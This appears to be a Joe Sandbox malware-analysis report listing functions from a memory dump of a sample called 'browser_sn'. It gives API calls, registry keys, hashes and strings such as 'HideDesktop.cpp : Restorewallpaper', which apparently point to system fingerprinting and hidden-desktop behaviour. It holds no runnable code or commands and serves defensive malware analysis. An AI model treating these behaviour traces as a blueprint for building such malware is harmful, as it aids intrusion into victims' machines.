Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
Instruction ID: 3636dd243e5ad42e68d324f14ad510c3fd9c22b9de95214c2cae5a471ec492e0
Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
Instruction Fuzzy Hash: 1EF0DA62A64A4192EB64FF35EC510A8B334FF89F44BC05031C90D57365CF38E899C324

Function 00007FF790C4DD20 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF790C4DD37
free.LIBCMT ref: 00007FF790C4DD41

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

DeleteObject.GDI32 ref: 00007FF790C4DD4A
free.LIBCMT ref: 00007FF790C4DD54
DeleteObject.GDI32 ref: 00007FF790C4DD5D
free.LIBCMT ref: 00007FF790C4DD67

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction ID: 3636dd243e5ad42e68d324f14ad510c3fd9c22b9de95214c2cae5a471ec492e0
Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
Instruction Fuzzy Hash: 1EF0DA62A64A4192EB64FF35EC510A8B334FF89F44BC05031C90D57365CF38E899C324

Function 00007FF790C87530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C87574
GetProcAddress.KERNEL32 ref: 00007FF790C87591
FreeLibrary.KERNEL32 ref: 00007FF790C87619

Strings

USER32, xrefs: 00007FF790C8756D
EnumDisplayDevicesA, xrefs: 00007FF790C87587

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction ID: 704b5127b80ac72d71a78d349b4172f73d2421992529e52b8f53150a775a73bc
Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
Instruction Fuzzy Hash: C9319532629B8285EA74EB35B4546E9A2A0FF86754F944235DE9D03794EF3CF841C720

Function 00007FF790C872F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C87335
GetProcAddress.KERNEL32 ref: 00007FF790C87352
FreeLibrary.KERNEL32 ref: 00007FF790C873D9

Strings

USER32, xrefs: 00007FF790C8732E
EnumDisplayDevicesA, xrefs: 00007FF790C87348

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
Instruction ID: 287f685b6c245b117f5ae046f909f7bd88eb6995e8a6f8c8d09f2510fca91112
Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
Instruction Fuzzy Hash: DF319332628B8285EA71EB35E4446A9F3A0FF8AB94F940235DE9D03794EF3CE541C710

Function 00007FF790C87410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C87455
GetProcAddress.KERNEL32 ref: 00007FF790C87472
FreeLibrary.KERNEL32 ref: 00007FF790C874F9

Strings

USER32, xrefs: 00007FF790C8744E
EnumDisplayDevicesA, xrefs: 00007FF790C87468

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
Instruction ID: 27ef8ba840b73955a6ab7153936544b6091fa7b77d6bf6f92d7a8cdc2f0cea47
Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
Instruction Fuzzy Hash: F3319532628B8185EA70EB35E4546A9B7A0FFCAB94F940235DE9D03795EF3CE5418B10

Function 00007FF790C36BA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF790C36BDE
RegQueryValueExA.ADVAPI32 ref: 00007FF790C36C1C
RegCloseKey.ADVAPI32 ref: 00007FF790C36C9C

Strings

CSDVersion, xrefs: 00007FF790C36C05
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF790C36BC0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
API String ID: 3677997916-605553437
Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
Instruction ID: 6e5a9bc2f39314fe25845cfc2fad4a70fe52801a25a7fa55c376ef8747b2c5c3
Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
Instruction Fuzzy Hash: 44316161A3968281EB709B30F4547AAB7A0FF46754F806232F6DE46B94DF2CE454CB20

Function 00007FF790C871D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C87212
GetProcAddress.KERNEL32 ref: 00007FF790C8722F
FreeLibrary.KERNEL32 ref: 00007FF790C8729D

Strings

USER32, xrefs: 00007FF790C8720B
EnumDisplayDevicesA, xrefs: 00007FF790C87225

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: EnumDisplayDevicesA$USER32
API String ID: 145871493-2970514552
Opcode ID: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction ID: 208c953037db22946e5f5df633745dd6d04cc7ecd960953127e70a906da64dd5
Opcode Fuzzy Hash: 20b902f79b4c6cb6d22b363d0868b8f0204c862da4352ce45faa7478bd25a1e0
Instruction Fuzzy Hash: F4218132B28B8182E770EF35A4446A9A3A5FF89794F850235DE9D43784EF3CE4018710

Function 00007FF790C3A600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF790C3A661

Part of subcall function 00007FF790C3A200: GetProcAddress.KERNEL32 ref: 00007FF790C3A225
Part of subcall function 00007FF790C3A200: FreeLibrary.KERNEL32 ref: 00007FF790C3A265

Part of subcall function 00007FF790C3A290: CoInitialize.OLE32 ref: 00007FF790C3A2B8
Part of subcall function 00007FF790C3A290: CoCreateInstance.OLE32 ref: 00007FF790C3A2E5

SystemParametersInfoA.USER32 ref: 00007FF790C3A694

Strings

HideDesktop.cpp : Restorewallpaper %i, xrefs: 00007FF790C3A60B
HideDesktop.cpp : Restorewallpaper %i %i, xrefs: 00007FF790C3A635
shell32.dll, xrefs: 00007FF790C3A65A

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
API String ID: 3848869850-2975526927
Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction ID: 2348791309ee8b4c1544fab2cbeba3af704d9185d7826dbfe1c8875d9e9190ed
Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
Instruction Fuzzy Hash: AF115761E3910392FA78BB30E8116F5A7A1BF82704FC06435D04E023A1DE3DF619CBA1

Function 00007FF790C36CC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF790C36CF3
RegQueryValueExA.ADVAPI32 ref: 00007FF790C36D35
RegCloseKey.ADVAPI32 ref: 00007FF790C36D54

Strings

System\CurrentControlSet\Control\Terminal Server, xrefs: 00007FF790C36CCE
TSAppCompat, xrefs: 00007FF790C36D16

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
API String ID: 3677997916-252502655
Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
Instruction ID: 023a1d06142687f00f60df30680f6d09c358aa2a4e24ccb85b532d60f60d84e2
Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
Instruction Fuzzy Hash: 1E015271638B8286EB609B31F44475AF7B4FB84798F801135E68D06B64DF7CE154CB10

Function 00007FF790C36D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF790C36D93
RegQueryValueExA.ADVAPI32 ref: 00007FF790C36DD1
RegCloseKey.ADVAPI32 ref: 00007FF790C36DF0

Strings

System\WPA\MediaCenter, xrefs: 00007FF790C36D6E
Installed, xrefs: 00007FF790C36DBA

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Installed$System\WPA\MediaCenter
API String ID: 3677997916-3461404619
Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction ID: 033e3a6f8711d5b966be74b605a14da37e491625c0a91708d468f3cd342d1c00
Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction Fuzzy Hash: 8901FA72628B8282EB609B31F44479AF7B4FB84794F805135EA8E46B68DF3CE154CB14

Function 00007FF790C3A4C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF790C3A4E5
RegSetValueExA.ADVAPI32 ref: 00007FF790C3A528
RegCloseKey.ADVAPI32 ref: 00007FF790C3A533

Strings

Control Panel\Desktop, xrefs: 00007FF790C3A4C9
WallpaperStyle, xrefs: 00007FF790C3A521

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseOpenValue
String ID: Control Panel\Desktop$WallpaperStyle
API String ID: 779948276-747434185
Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
Instruction ID: 4e8e3fef3330a7bf2ac3f3edd50be6ffdded4a31be51c53e052823c5c00e1d36
Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
Instruction Fuzzy Hash: AA012135628B4182DB209B34F844555F3B0FB857A4F806331E96D43BE8DF2DE514CB00

Function 00007FF790C3A440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF790C3A465
RegQueryValueExA.ADVAPI32 ref: 00007FF790C3A49F
RegCloseKey.ADVAPI32 ref: 00007FF790C3A4AA

Strings

Control Panel\Desktop, xrefs: 00007FF790C3A449
WallpaperStyle, xrefs: 00007FF790C3A479

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Desktop$WallpaperStyle
API String ID: 3677997916-747434185
Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
Instruction ID: 574d9906d791d4152978e5e11699446495fbd0333c66951a7e4ca2f5bb43b0fc
Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
Instruction Fuzzy Hash: EAF0CD35A28B4381EB209B34F454656A774FB85789FD02131EA8D07B64DF3DE155CB10

Function 00007FF790CE929C Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF790CE9274

Part of subcall function 00007FF790CF3848: _amsg_exit.LIBCMT ref: 00007FF790CF385E

_errno.LIBCMT ref: 00007FF790CF7168
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF7173

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 1050512615-0
